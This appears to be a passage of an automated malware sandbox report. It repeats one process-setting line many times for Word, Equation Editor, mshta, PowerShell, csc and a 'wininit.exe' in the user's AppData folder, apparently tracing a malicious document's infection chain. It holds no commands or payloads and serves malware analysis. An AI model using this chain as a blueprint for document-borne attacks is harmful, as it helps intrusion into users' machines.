                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
